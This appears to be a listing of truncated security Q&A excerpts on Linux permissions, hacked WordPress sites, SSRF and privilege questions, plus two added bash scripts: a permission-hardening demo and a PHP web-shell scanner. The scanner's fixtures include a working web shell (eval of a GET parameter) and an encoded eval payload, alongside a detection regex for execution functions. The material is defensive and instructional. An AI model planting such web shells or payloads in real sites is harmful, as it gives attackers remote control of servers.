I am a beginner and I am trying to program a secure website to improve my skills and knowledge. I am under Linux and I am using LAMP with php. My website is similar to a social network so people will ...

Recently, a website I hosted (WordPress, I think) for a friend got hacked and all PHP pages had added code at the bottom in the form of "echo base64_encode(...);". Thus there were unwanted ads on very ...

I know it is not right to set the permission of a folder to 777, but if it is done so, will it be possible to upload a file into that directory without FTP access?
Here is what I mean.
Let's say the ...

I have a couple of CentOS VMs as part of a class I'm taking, I'm just trying to understand how loose permissions (other than the obvious 777) can be taken advantage of.
The targeted account on VM1 ...

The default setting is that the apache2 root directory Documents is owned by root and I have to enter a password each time I change it. This is why I want to give full permissions to my user account ...

I just discovered this fact tonight and I was rather floored by it. Isn't that a gaping security flaw? I realize that an external drive is less secure by virtue of the fact that someone could simply ...

I am running my own server, on which I have different services (Nginx etc.).
All these (internet) services are / should be secured with SSL (officially signed).
The key files / certificates are located ...

As far as I understand, if Dropbox wants to automatically run in the background without asking the user for a password, it has to store the password somewhere on the hard drive and has currently no way ...

Having /var/www/site.com owned by www-data:www-data with 750 permissions for directories and 640 for files, and having my user alexb added to the www-data group, I found myself with permission issues ...

I'm a Software Engineer, but I have no experience in security, so I'm trying to learn by doing (woot Experiential learning!).
I know that the permission settings on the tmp folder are very relaxed. ...

If I was able to view any page on a website as localhost using SSRF, what files should I check for? I checked to see if I could view robots.txt normally, and I couldn't, but using SSRF, I was able to. ...

The "Phone State" permission on Android is widely requested by many apps. The explanation often given by the developer is that the app needs it in order to determine when you're on the phone, to stop ...

I was wondering, assuming a "The Invention of Lying" world, but where no one was able to steal or misrepresent themselves how much faster would computers be? Just to give two examples of what I mean, ...

Let's say a web application has four user roles: Standard, Supervisor, Manager and Administrator.
Should a manager be able to promote someone else to a Manager, or only to a supervisor?
I realize in ...

I am not sure about that. It should run in kernel mode in order to prevent some user-mode program from killing/suspending the firewall and doing its dirty job.
The malware would not be able to kill the firewall ...

I need to re-work our current security model for desktop computers, and would like some insight as to what changes can be made as well as best practices.
Currently we have the helpdesk role that is ...

I want to do inter process communication between Firefox (via extension) and my application. Both reside in "Program files" (of windows 7 OS). I also assume that malware is running in the system and ...

While installing a new XP machine that had not been connected to the domain I was browsing to a UNC path and was not prompted for authentication. I then went to the different mapped drives and found ...

The default Debian way of setting up a common web server (Nginx) is to run the main process as root and unprivileged workers as www-data. In order to allow for the worker processes to read/execute web ...
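The two questions about web-root ownership (the 750/640 tree with a deploying user added to www-data, and the Nginx master-as-root, workers-as-www-data layout) come down to which identity class, owner, group or other, holds which bits. The script below is an added example, not code from any of the posts: it builds a constructed tree under a temp directory with the questioned modes, counts what a group member or the world could write to, and applies a narrower fix than 777. The paths, the single "uploads" directory that is allowed to be group-writable, and the use of the current user as owner (chown needs root) are assumptions of the example. The world-writable count is the check to run against the 777 setups asked about earlier on the page.

```bash
#!/bin/sh
# Added example (not from the posts above). Models /var/www/site.com as
# described in the questions: directories 750, files 640. A user who is only
# a member of the owning group then has read and traverse but no write, which
# is the "permission issues" a deploying user hits. Runs as an ordinary user:
# the tree lives under a temp dir and stays owned by the current user.
set -eu

# Build a small constructed web root and apply the questioned mode bits.
make_site() {
    root="$1"
    mkdir -p "$root/public/uploads" "$root/config"
    printf '<?php echo "hi";\n' > "$root/public/index.php"
    printf 'secret=x\n' > "$root/config/db.ini"
    find "$root" -type d -exec chmod 750 {} +
    find "$root" -type f -exec chmod 640 {} +
}

# Number of entries a group member (not the owner) could write to.
# -perm -020 matches when the group-write bit is set (octal, so it works
# with POSIX find, not only GNU find's symbolic modes).
group_writable_count() {
    find "$1" -perm -020 | wc -l | tr -d ' '
}

# Number of world-writable entries: the 777 problem from the other
# questions. Anything here can be modified by every local account,
# including a compromised web worker, without FTP or SSH access.
world_writable_count() {
    find "$1" -perm -002 | wc -l | tr -d ' '
}

# Least-privilege fix for a shared deploy group: leave "other" at zero,
# set the setgid bit on every directory so files created inside inherit
# the directory's group (www-data in the real setup) rather than the
# creator's primary group, and grant group write only where the server
# or the deployer genuinely has to write (assumed here: the uploads dir).
harden_site() {
    root="$1"
    find "$root" -type d -exec chmod g+s {} +
    chmod 2770 "$root/public/uploads"
}

# Stand-alone run: report the counts before and after hardening.
main() {
    tmp=$(mktemp -d)
    make_site "$tmp/site"
    echo "before: group-writable=$(group_writable_count "$tmp/site") world-writable=$(world_writable_count "$tmp/site")"
    harden_site "$tmp/site"
    echo "after:  group-writable=$(group_writable_count "$tmp/site") world-writable=$(world_writable_count "$tmp/site")"
    rm -rf "$tmp"
}
[ "${0##*/}" = "perms-demo.sh" ] && main
```

With the questioned modes the group member can write nowhere, so deploying as that user fails; after the fix only the one directory that must accept writes is group-writable, and nothing is world-writable. If the deployer needs to overwrite code files as well, the cleaner answer is to deploy as the owning user (or via ACLs) rather than to widen the group bits across the whole tree.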

I fail to grasp the necessity of the concept of owner (ownership) and to find a clear explanation of its necessity.
What cannot be done without the concept of owner (ownership) in a filesystem/database object ...

I've compromised two Linux user accounts on a RHEL machine (neither of which have root permissions) and I want to determine which account is more 'useful' to me in terms of access and privileges. Is ...

I have a server for which I have created a cron job "sendalerts" to users. Mind you, this "sendalerts.php" should be runnable via two methods (via browser and also via a cron job).
So cron's job is to ...

I have found on my web server the file wp-conf.php which when you call it from the browser with a url parameter like wp-conf.php?t7831n=any value shows an interface where you can control the entire ...
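Both the earlier question about base64 payloads appended to every PHP page and this one about a file that opens a control panel when called with a particular URL parameter describe injected PHP. The script below is an added example, not code from either post: it builds a constructed sample tree (one clean file, one with a decoder-wrapped payload appended, one with a parameter-gated eval) and lists the PHP files that match a small set of web-shell markers. The file names, the marker list and the sample contents are assumptions of the example; the list is a triage starting point, since legitimate code also calls base64_decode.

```bash
#!/bin/sh
# Added example (not from the posts above). Scans a web root for the two
# shapes of injected PHP seen in the questions: obfuscation decoders wrapped
# around a payload, and request parameters fed straight into code execution.
set -eu

# Constructed sample tree. index.php is clean; footer.php has a payload
# appended after the closing tag; wp-conf.php executes a GET parameter.
make_sample() {
    root="$1"
    mkdir -p "$root/wp-content"
    printf '<?php\necho "clean page";\n' > "$root/index.php"
    printf '<?php\necho "page";\n?>\n<?php eval(base64_decode("cGhwaW5mbygpOw==")); ?>\n' \
        > "$root/wp-content/footer.php"
    printf '<?php\nif (isset($_GET["t7831n"])) { eval($_GET["t7831n"]); }\n' \
        > "$root/wp-conf.php"
}

# Two marker groups, joined into one extended regex:
#  1. an execution primitive whose argument list reaches a superglobal
#  2. a decoder commonly used to hide a payload in a string literal
MARKERS='(eval|assert|system|passthru|shell_exec|preg_replace)[[:space:]]*\(.*\$_(GET|POST|REQUEST|COOKIE)|(base64_decode|gzinflate|gzuncompress|str_rot13)[[:space:]]*\('

# Print the path of every PHP file under the root that matches a marker,
# one per line, sorted so the output is stable for diffing between scans.
scan_php() {
    find "$1" -type f -name '*.php' -exec grep -lE "$MARKERS" {} + | sort
}

# Number of flagged files, handy for a cron check that alerts on non-zero.
scan_count() {
    scan_php "$1" | wc -l | tr -d ' '
}

# Stand-alone run against the constructed sample.
main() {
    tmp=$(mktemp -d)
    make_sample "$tmp/site"
    scan_php "$tmp/site"
    rm -rf "$tmp"
}
[ "${0##*/}" = "phpscan.sh" ] && main
```

On the sample the scan reports footer.php and wp-conf.php and leaves index.php alone. After cleaning an infection the same scan, plus a check that no PHP file is writable by the web server account, is what tells you whether the write path that let the code be appended has actually been closed.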

I have a new WordPress website that has been installed on a server not managed by me. Its admin has enforced a few rules in order to increase security; I'm not entirely aware of them in their entirety, but it ...

I recently found that in Microsoft .NET framework an impersonated thread is not allowed to request "time at which the current process was started". This could be done intentionally or this could be ...